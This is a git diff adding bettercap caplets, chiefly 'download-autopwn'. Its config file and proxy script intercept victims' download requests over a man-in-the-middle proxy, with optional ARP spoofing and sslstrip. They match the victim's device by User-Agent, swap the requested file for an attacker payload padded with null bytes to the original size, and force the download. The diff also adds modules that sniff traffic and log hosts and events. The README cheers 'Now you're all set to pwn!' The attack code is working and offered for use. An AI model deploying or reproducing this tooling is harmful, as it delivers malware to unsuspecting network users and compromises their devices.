Content-Disposition header to enforce file download instead of in-browser preview + res.SetHeader("Content-Disposition", "attachment; filename=\"" + requestedFileName + "\"") + // Update Content-Length header in case our payload is larger than the requested file + res.SetHeader("Content-Length", payload.length) + logStr += redLine + " Serving your payload to " + boldRed + req.Client.IP + reset + "...\n" + log(logStr) + res.Body = payload + } + } + } + } + } +} +``` + +
+ +### Now you're all set to pwn! + +#### What it looks like when you have configured a crazy amount of payloads + +![screenshot 1](https://user-images.githubusercontent.com/29265684/37411166-e3796c46-27ed-11e8-94da-8e1c226a0dd3.png) + +#### What it looks like when you pwn someone's download >:-) + +![screenshot 2](https://user-images.githubusercontent.com/29265684/37409382-f6bb143e-27e9-11e8-86c5-c1c556900556.png) + +Have fun! diff --git a/download-autopwn/android/payload.apk b/download-autopwn/android/payload.apk new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.apk differ diff --git a/download-autopwn/android/payload.jar b/download-autopwn/android/payload.jar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.jar differ diff --git a/download-autopwn/android/payload.mkv b/download-autopwn/android/payload.mkv new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.mkv differ diff --git a/download-autopwn/android/payload.mp3 b/download-autopwn/android/payload.mp3 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.mp3 differ diff --git a/download-autopwn/android/payload.mp4 b/download-autopwn/android/payload.mp4 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.mp4 differ diff --git a/download-autopwn/android/payload.pdf b/download-autopwn/android/payload.pdf new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.pdf differ diff --git a/download-autopwn/android/payload.pfx b/download-autopwn/android/payload.pfx new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.pfx differ diff --git a/download-autopwn/android/payload.py b/download-autopwn/android/payload.py new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.py differ diff --git a/download-autopwn/android/payload.sh b/download-autopwn/android/payload.sh new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.sh differ diff --git a/download-autopwn/android/payload.tar b/download-autopwn/android/payload.tar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.tar differ diff --git a/download-autopwn/android/payload.tar.gz b/download-autopwn/android/payload.tar.gz new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.tar.gz differ diff --git a/download-autopwn/android/payload.tgz b/download-autopwn/android/payload.tgz new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.tgz differ diff --git a/download-autopwn/android/payload.zip b/download-autopwn/android/payload.zip new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.zip differ diff --git a/download-autopwn/download-autopwn.cap b/download-autopwn/download-autopwn.cap new file mode 100644 index 0000000..0ed8217 --- /dev/null +++ b/download-autopwn/download-autopwn.cap @@ -0,0 +1,51 @@ +# documentation can be found at https://github.com/bettercap/blob/master/download-autopwn/README.md +# +# this module lets you intercept very specific download requests and replaces the payload with one of your choice +# +# in order for a download to get intercepted: +# 1. the victim's user-agent string must match the downloadautopwn.useragent.x regexp value +# 2. the requested file must match one of the downloadautopwn.extensions.x file extensions +# +# you can find the downloadautopwn.devices in the download-autopwn/ folder (you can add your own) +# + +# choose the devices from which downloads get pwned (enter the dir names of choice from download-autopwn/) +# (or feel free to add your own) +set downloadautopwn.devices android,ios,linux,macos,ps4,windows,xbox + +# choose the regexp value that the victim's User-Agent has to match +# (feel free to add your own) +set downloadautopwn.useragent.android Android +set downloadautopwn.useragent.ios iPad|iPhone|iPod +set downloadautopwn.useragent.linux Linux +set downloadautopwn.useragent.macos Intel Mac OS X 10_ +set downloadautopwn.useragent.ps4 PlayStation 4 +set downloadautopwn.useragent.windows Windows|WOW64 +set downloadautopwn.useragent.xbox Xbox + +# choose which file extensions get intercepted and replaced by your payload on specific devices (payloads are in download-autopwn/.../) +# (again, you can add as many as you want) +# make sure the payload files exist and that they are all named "payload" (for example: payload.exe) +set downloadautopwn.extensions.android apk,pdf,sh,pfx,zip +set downloadautopwn.extensions.ios ipa,ios,ipb,ipsw,ipsx,ipcc,mobileconfig,pdf,zip +set downloadautopwn.extensions.linux c,go,sh,py,rb,cr,pl,deb,pdf,jar,zip +set downloadautopwn.extensions.macos app,dmg,doc,docx,jar,ai,ait,psd,pdf,c,go,sh,py,rb,pl,terminal,zip +set downloadautopwn.extensions.ps4 disc,pup,pdf,doc,docx,zip +set downloadautopwn.extensions.windows exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip +set downloadautopwn.extensions.xbox exe,msi,jar,pdf,doc,docx,zip + +# choose whether the proxy module resizes your payload to the requested file's size (if not set then default=false) +set downloadautopwn.resizepayloads true + +# set download-autopwn.js as proxy script +set http.proxy.script download-autopwn.js +# uncomment if you want sslstrip enabled +# set http.proxy.sslstrip true +# start proxy +http.proxy on + +# wait for everything to start properly +sleep 1 + +# uncomment if you want arp spoofing (make sure probing is off as it conflicts with arp spoofing) +# arp.spoof on diff --git a/download-autopwn/download-autopwn.js b/download-autopwn/download-autopwn.js new file mode 100644 index 0000000..20fb9d1 --- /dev/null +++ b/download-autopwn/download-autopwn.js @@ -0,0 +1,84 @@ +var targets = {} + +var nullbyte = "\u0000" + +var green = "\033[32m", + boldRed = "\033[1;31m", + onRed = "\033[41m", + reset = "\033[0m", + redLine = "\n " + onRed + " " + reset + +function onLoad() { + devices = env["downloadautopwn.devices"].split(",") + logStr = "" + for (var i = 0; i < devices.length; i++) { + item = { + "device": devices[i], + "useragent": env[ "downloadautopwn.useragent." + devices[i] ], + "extensions": env[ "downloadautopwn.extensions." + devices[i] ].toLowerCase().split(",") + } + targets[i] = item + logStr += "\n " + green + targets[i]["device"] + reset + + "\n User-Agent: " + targets[i]["useragent"] + + "\n Extensions: " + targets[i]["extensions"] + "\n" + } + log("Download Autopwn loaded.\n\nDownload Autopwn targets: \n" + logStr) +} + +function onResponse(req, res) { + // First of all check whether the requested path might have an extension (to save cpu) + var requestedFileName = req.Path.replace(/.*\//g, "") + if ( requestedFileName.indexOf(".") != -1 ) { + var userAgent = req.GetHeader("User-Agent", ""), + extension + // Iterate through targets + for ( var t = 0; t < Object.keys(targets).length; t++ ) { + // Check if User-Agent is a target + regex = new RegExp(targets[t]["useragent"]) + if ( userAgent.match(regex) ) { + // Iterate through target extensions + for (var e = 0; e < targets[t]["extensions"].length; e++) { + // Check if requested path contains a targeted extension + // function endsWith() could be a nice simplification here + if ( requestedFileName.replace(/.*\./g, "").toLowerCase() == targets[t]["extensions"][e] ) { + extension = targets[t]["extensions"][e] + // Autopwn + logStr = "\n" + redLine + " Autopwning download request from " + boldRed + req.Client.IP + reset + + redLine + + redLine + " Found " + boldRed + extension.toUpperCase() + reset + " extension in " + boldRed + req.Hostname + req.Path + reset + + redLine + + redLine + " Grabbing " + boldRed + targets[t]["device"].toUpperCase() + reset + " payload..." + // Check our payload size + payload = readFile("/usr/local/share/bettercap/caplets/download-autopwn/" + targets[t]["device"] + "/payload." + extension) + payloadSize = payload.length + logStr += redLine + " The raw size of your payload is " + boldRed + payloadSize + reset + " bytes" + // Append nullbytes to payload if resizing is enabled and if requested file is larger than payload + if ( env["downloadautopwn.resizepayloads"] == "true" ) { + // Check requested file size + requestedFileSize = parseInt(res.GetHeader("Content-Length", "0")) + if (requestedFileSize == 0) { + requestedFileSize = res.ReadBody().length + } + logStr += redLine + " The size of the requested file is " + boldRed + requestedFileSize + reset + " bytes" + // Append nullbytes if required + if (requestedFileSize > payloadSize) { + logStr += redLine + " Resizing your payload to " + boldRed + requestedFileSize + reset + " bytes..." + sizeDifference = requestedFileSize - payloadSize + nullbyteString = Array(sizeDifference + 1).join(nullbyte) + payload += nullbyteString + } + } + // Set Content-Disposition header to enforce file download instead of in-browser preview + res.SetHeader("Content-Disposition", "attachment; filename=\"" + requestedFileName + "\"") + // Update Content-Length header + res.RemoveHeader("Content-Length") + logStr += redLine + + redLine + " Serving your payload to " + boldRed + req.Client.IP + reset + "...\n" + log(logStr) + res.Body = payload + } + } + } + } + } +} diff --git a/download-autopwn/ios/payload.ios b/download-autopwn/ios/payload.ios new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.ios differ diff --git a/download-autopwn/ios/payload.ipa b/download-autopwn/ios/payload.ipa new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.ipa differ diff --git a/download-autopwn/ios/payload.ipb b/download-autopwn/ios/payload.ipb new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.ipb differ diff --git a/download-autopwn/ios/payload.ipcc b/download-autopwn/ios/payload.ipcc new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.ipcc differ diff --git a/download-autopwn/ios/payload.ipsw b/download-autopwn/ios/payload.ipsw new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.ipsw differ diff --git a/download-autopwn/ios/payload.ipsx b/download-autopwn/ios/payload.ipsx new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.ipsx differ diff --git a/download-autopwn/ios/payload.m4a b/download-autopwn/ios/payload.m4a new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.m4a differ diff --git a/download-autopwn/ios/payload.mkv b/download-autopwn/ios/payload.mkv new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.mkv differ diff --git a/download-autopwn/ios/payload.mobileconfig b/download-autopwn/ios/payload.mobileconfig new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.mobileconfig differ diff --git a/download-autopwn/ios/payload.mp3 b/download-autopwn/ios/payload.mp3 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.mp3 differ diff --git a/download-autopwn/ios/payload.mp4 b/download-autopwn/ios/payload.mp4 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.mp4 differ diff --git a/download-autopwn/ios/payload.pdf b/download-autopwn/ios/payload.pdf new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.pdf differ diff --git a/download-autopwn/ios/payload.zip b/download-autopwn/ios/payload.zip new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.zip differ diff --git a/download-autopwn/linux/payload.c b/download-autopwn/linux/payload.c new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.c differ diff --git a/download-autopwn/linux/payload.cr b/download-autopwn/linux/payload.cr new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.cr differ diff --git a/download-autopwn/linux/payload.deb b/download-autopwn/linux/payload.deb new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.deb differ diff --git a/download-autopwn/linux/payload.go b/download-autopwn/linux/payload.go new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.go differ diff --git a/download-autopwn/linux/payload.jar b/download-autopwn/linux/payload.jar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.jar differ diff --git a/download-autopwn/linux/payload.mp3 b/download-autopwn/linux/payload.mp3 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.mp3 differ diff --git a/download-autopwn/linux/payload.mp4 b/download-autopwn/linux/payload.mp4 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.mp4 differ diff --git a/download-autopwn/linux/payload.pdf b/download-autopwn/linux/payload.pdf new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.pdf differ diff --git a/download-autopwn/linux/payload.pl b/download-autopwn/linux/payload.pl new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.pl differ diff --git a/download-autopwn/linux/payload.py b/download-autopwn/linux/payload.py new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.py differ diff --git a/download-autopwn/linux/payload.rb b/download-autopwn/linux/payload.rb new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.rb differ diff --git a/download-autopwn/linux/payload.sh b/download-autopwn/linux/payload.sh new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.sh differ diff --git a/download-autopwn/linux/payload.tar b/download-autopwn/linux/payload.tar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.tar differ diff --git a/download-autopwn/linux/payload.tar.gz b/download-autopwn/linux/payload.tar.gz new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.tar.gz differ diff --git a/download-autopwn/linux/payload.tgz b/download-autopwn/linux/payload.tgz new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.tgz differ diff --git a/download-autopwn/linux/payload.zip b/download-autopwn/linux/payload.zip new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.zip differ diff --git a/download-autopwn/macos/payload.7z b/download-autopwn/macos/payload.7z new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.7z differ diff --git a/download-autopwn/macos/payload.ai b/download-autopwn/macos/payload.ai new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.ai differ diff --git a/download-autopwn/macos/payload.ait b/download-autopwn/macos/payload.ait new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.ait differ diff --git a/download-autopwn/macos/payload.app b/download-autopwn/macos/payload.app new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.app differ diff --git a/download-autopwn/macos/payload.c b/download-autopwn/macos/payload.c new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.c differ diff --git a/download-autopwn/macos/payload.dmg b/download-autopwn/macos/payload.dmg new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.dmg differ diff --git a/download-autopwn/macos/payload.doc b/download-autopwn/macos/payload.doc new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.doc differ diff --git a/download-autopwn/macos/payload.docx b/download-autopwn/macos/payload.docx new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.docx differ diff --git a/download-autopwn/macos/payload.jar b/download-autopwn/macos/payload.jar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.jar differ diff --git a/download-autopwn/macos/payload.m4a b/download-autopwn/macos/payload.m4a new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.m4a differ diff --git a/download-autopwn/macos/payload.mov b/download-autopwn/macos/payload.mov new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.mov differ diff --git a/download-autopwn/macos/payload.mp3 b/download-autopwn/macos/payload.mp3 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.mp3 differ diff --git a/download-autopwn/macos/payload.mp4 b/download-autopwn/macos/payload.mp4 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.mp4 differ diff --git a/download-autopwn/macos/payload.pdf b/download-autopwn/macos/payload.pdf new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.pdf differ diff --git a/download-autopwn/macos/payload.psd b/download-autopwn/macos/payload.psd new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.psd differ diff --git a/download-autopwn/macos/payload.py b/download-autopwn/macos/payload.py new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.py differ diff --git a/download-autopwn/macos/payload.rb b/download-autopwn/macos/payload.rb new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.rb differ diff --git a/download-autopwn/macos/payload.sh b/download-autopwn/macos/payload.sh new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.sh differ diff --git a/download-autopwn/macos/payload.tar b/download-autopwn/macos/payload.tar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.tar differ diff --git a/download-autopwn/macos/payload.tar.gz b/download-autopwn/macos/payload.tar.gz new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.tar.gz differ diff --git a/download-autopwn/macos/payload.terminal b/download-autopwn/macos/payload.terminal new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.terminal differ diff --git a/download-autopwn/macos/payload.tgz b/download-autopwn/macos/payload.tgz new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.tgz differ diff --git a/download-autopwn/macos/payload.zip b/download-autopwn/macos/payload.zip new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.zip differ diff --git a/download-autopwn/ps4/payload.aac b/download-autopwn/ps4/payload.aac new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.aac differ diff --git a/download-autopwn/ps4/payload.avi b/download-autopwn/ps4/payload.avi new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.avi differ diff --git a/download-autopwn/ps4/payload.disc b/download-autopwn/ps4/payload.disc new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.disc differ diff --git a/download-autopwn/ps4/payload.doc b/download-autopwn/ps4/payload.doc new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.doc differ diff --git a/download-autopwn/ps4/payload.docx b/download-autopwn/ps4/payload.docx new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.docx differ diff --git a/download-autopwn/ps4/payload.flac b/download-autopwn/ps4/payload.flac new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.flac differ diff --git a/download-autopwn/ps4/payload.m4a b/download-autopwn/ps4/payload.m4a new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.m4a differ diff --git a/download-autopwn/ps4/payload.mkv b/download-autopwn/ps4/payload.mkv new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.mkv differ diff --git a/download-autopwn/ps4/payload.mp3 b/download-autopwn/ps4/payload.mp3 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.mp3 differ diff --git a/download-autopwn/ps4/payload.mp4 b/download-autopwn/ps4/payload.mp4 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.mp4 differ diff --git a/download-autopwn/ps4/payload.pdf b/download-autopwn/ps4/payload.pdf new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.pdf differ diff --git a/download-autopwn/ps4/payload.pup b/download-autopwn/ps4/payload.pup new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.pup differ diff --git a/download-autopwn/ps4/payload.zip b/download-autopwn/ps4/payload.zip new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.zip differ diff --git a/download-autopwn/windows/payload.7z b/download-autopwn/windows/payload.7z new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.7z differ diff --git a/download-autopwn/windows/payload.ai b/download-autopwn/windows/payload.ai new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.ai differ diff --git a/download-autopwn/windows/payload.ait b/download-autopwn/windows/payload.ait new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.ait differ diff --git a/download-autopwn/windows/payload.avi b/download-autopwn/windows/payload.avi new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.avi differ diff --git a/download-autopwn/windows/payload.bat b/download-autopwn/windows/payload.bat new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.bat differ diff --git a/download-autopwn/windows/payload.dll b/download-autopwn/windows/payload.dll new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.dll differ diff --git a/download-autopwn/windows/payload.doc b/download-autopwn/windows/payload.doc new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.doc differ diff --git a/download-autopwn/windows/payload.docx b/download-autopwn/windows/payload.docx new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.docx differ diff --git a/download-autopwn/windows/payload.exe b/download-autopwn/windows/payload.exe new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.exe differ diff --git a/download-autopwn/windows/payload.flv b/download-autopwn/windows/payload.flv new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.flv differ diff --git a/download-autopwn/windows/payload.jar b/download-autopwn/windows/payload.jar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.jar differ diff --git a/download-autopwn/windows/payload.mp3 b/download-autopwn/windows/payload.mp3 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.mp3 differ diff --git a/download-autopwn/windows/payload.mp4 b/download-autopwn/windows/payload.mp4 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.mp4 differ diff --git a/download-autopwn/windows/payload.msi b/download-autopwn/windows/payload.msi new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.msi differ diff --git a/download-autopwn/windows/payload.pdf b/download-autopwn/windows/payload.pdf new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.pdf differ diff --git a/download-autopwn/windows/payload.psd b/download-autopwn/windows/payload.psd new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.psd differ diff --git a/download-autopwn/windows/payload.rar b/download-autopwn/windows/payload.rar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.rar differ diff --git a/download-autopwn/windows/payload.swf b/download-autopwn/windows/payload.swf new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.swf differ diff --git a/download-autopwn/windows/payload.wav b/download-autopwn/windows/payload.wav new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.wav differ diff --git a/download-autopwn/windows/payload.zip b/download-autopwn/windows/payload.zip new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.zip differ diff --git a/download-autopwn/xbox/payload.doc b/download-autopwn/xbox/payload.doc new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/xbox/payload.doc differ diff --git a/download-autopwn/xbox/payload.docx b/download-autopwn/xbox/payload.docx new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/xbox/payload.docx differ diff --git a/download-autopwn/xbox/payload.exe b/download-autopwn/xbox/payload.exe new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/xbox/payload.exe differ diff --git a/download-autopwn/xbox/payload.jar b/download-autopwn/xbox/payload.jar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/xbox/payload.jar differ diff --git a/download-autopwn/xbox/payload.msi b/download-autopwn/xbox/payload.msi new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/xbox/payload.msi differ diff --git a/download-autopwn/xbox/payload.pdf b/download-autopwn/xbox/payload.pdf new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/xbox/payload.pdf differ diff --git a/download-autopwn/xbox/payload.zip b/download-autopwn/xbox/payload.zip new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/xbox/payload.zip differ diff --git a/enumerate/events/README.md b/enumerate/events/README.md new file mode 100644 index 0000000..93d44fe --- /dev/null +++ b/enumerate/events/README.md @@ -0,0 +1,11 @@ +# enumerate.events + +A simple module that lets you enumerate events. + +Example: + +`enumerate.events.regexp GET|POST|HEAD|PUT|DELETE|CONNECT|OPTIONS|TRACE|PATCH|=>|Form:` + +(this command will print all HTTP events; regexp must be written as in `new RegExp()`) + +![screenshot from 2018-07-27 21-48-20](https://user-images.githubusercontent.com/29265684/43319311-97526282-91e7-11e8-854e-c209ba60b732.png) diff --git a/enumerate/events/module.cap b/enumerate/events/module.cap new file mode 100644 index 0000000..13136f2 --- /dev/null +++ b/enumerate/events/module.cap @@ -0,0 +1,13 @@ +# events.stream +events.stream off +set events.stream.output enumerate/events/session1.events.stream.output +events.stream on + +# net.sniff +set net.sniff.verbose false +net.sniff on + +# http.proxy +set http.proxy.script enumerate/events/module.js +set http.proxy.port 8023 +http.proxy on diff --git a/enumerate/events/module.js b/enumerate/events/module.js new file mode 100644 index 0000000..cbaca23 --- /dev/null +++ b/enumerate/events/module.js @@ -0,0 +1,36 @@ +var red = "\033[31m", + yellow = "\033[33m", + green = "\033[32m", + bold = "\033[1;37m", + reset = "\033[0m" + +function configure() { + if ( !readFile( env("events.stream.output") ) ) { + log_error("Error: " + bold + "events.stream.output" + reset + " file not found (got " + env("events.stream.output") + ")") + } +} + +function onCommand(cmd) { + if (cmd == "enumerate.events.all") { + console.log( readFile( env("events.stream.output") ) ) + return true + } + if ( cmd.match(/^enumerate\.events\.regexp ./) ) { + regexp = new RegExp( cmd.replace("enumerate.events.regexp ", "") ) + saved_events = readFile( env("events.stream.output") ).split("\n") + found_events = [] + for (var i = 0; i < saved_events.length; i++) { + saved_events[i].match(regexp) ? found_events.push(saved_events[i]) : "" + } + console.log( found_events.join("\n") ) + return true + } +} + +function onLoad() { + console.log("\n" + bold + " Commands" + reset + "\n") + console.log(" " + yellow + "enumerate.events.all" + reset + " : Enumerate all events.") + console.log(" " + yellow + "enumerate.events.regexp" + reset + " : Enumerate events with regexp value.\n") + configure() + log_info("(" + green + "enumerate.events" + reset + ") Module successfully loaded.") +} diff --git a/enumerate/hosts/README.md b/enumerate/hosts/README.md new file mode 100644 index 0000000..7cc32ab --- /dev/null +++ b/enumerate/hosts/README.md @@ -0,0 +1,7 @@ +# enumerate.hosts + +A simple module that lets you enumerate individual hosts. + +Example: + +![screenshot from 2018-07-27 00-37-40](https://user-images.githubusercontent.com/29265684/43269395-1cc4d330-9136-11e8-941b-f0d9fcb6e254.png) diff --git a/enumerate/hosts/module.cap b/enumerate/hosts/module.cap new file mode 100644 index 0000000..d8db3c3 --- /dev/null +++ b/enumerate/hosts/module.cap @@ -0,0 +1,21 @@ +# enumerate.hosts +set enumerate.hosts.output enumerate/hosts/session1.hosts.log + +# events.stream +events.stream off +set events.stream.output enumerate/hosts/session1.events.stream.output +events.stream on + +# net.sniff +set net.sniff.verbose false +net.sniff on + +# http.proxy +set http.proxy.script enumerate/hosts/module.js +set http.proxy.port 8022 +http.proxy on + +# ticker +set ticker.commands enumerate.hosts.save +set ticker.period 60 +ticker on diff --git a/enumerate/hosts/module.js b/enumerate/hosts/module.js new file mode 100644 index 0000000..8f0b01a --- /dev/null +++ b/enumerate/hosts/module.js @@ -0,0 +1,108 @@ +var enumerated_hosts = [] + +var red = "\033[31m", + yellow = "\033[33m", + green = "\033[32m", + bold = "\033[1;37m", + reset = "\033[0m" + +function configure() { + if ( !readFile( env("enumerate.hosts.output") ) ) { + log_info("(" + green + "enumerate.hosts" + reset + ") " + bold + "enumerate.hosts.output" + reset + " file was not found, creating one ...") + writeFile( env("enumerate.hosts.output"), "" ) + } + + if ( !readFile( env("events.stream.output") ) ) { + log_error("Error: " + bold + "events.stream.output" + reset + " file not found (got " + env("events.stream.output") + ")") + } +} + +function extractHosts() { + logs = readFile( env("events.stream.output") ).split("\n") + extracted_hosts = [] + + for (var i = 0; i < logs.length; i++) { + if ( logs[i].match(/\[.*?net\.sniff.*?\]/i) ) { + host = logs[i].replace(/.*\033\[33m(https:\/\/|)(.*?)\033\[0m.*/g, "$2") + extracted_hosts.indexOf(host) == -1 ? extracted_hosts.push(host) : "" + } + } + + return extracted_hosts +} + +function compareHosts(old_hosts, new_hosts) { + difference = [] + + for (var i = 0; i < new_hosts.length; i++) { + old_hosts.indexOf(new_hosts[i]) == -1 ? difference.push(new_hosts[i]) : "" + } + + return difference +} + +function saveHosts(new_hosts) { + saved_hosts = readFile( env("enumerate.hosts.output") ).split("\n") + + for (var i = 0; i < new_hosts.length; i++) { + saved_hosts.indexOf(new_hosts[i]) == -1 ? saved_hosts.push(new_hosts[i]) : "" + } + + writeFile( env("enumerate.hosts.output"), saved_hosts.join("\n") ) +} + +function printHosts(hosts) { + if (hosts.length != 0) { + log_string = "" + + for (var i = 0; i < hosts.length; i++) { + log_string += " " + yellow + hosts[i] + reset + "\n" + enumerated_hosts.indexOf(hosts[i]) == -1 ? enumerated_hosts.push(hosts[i]) : "" + } + + console.log("\n" + log_string) + } else { + 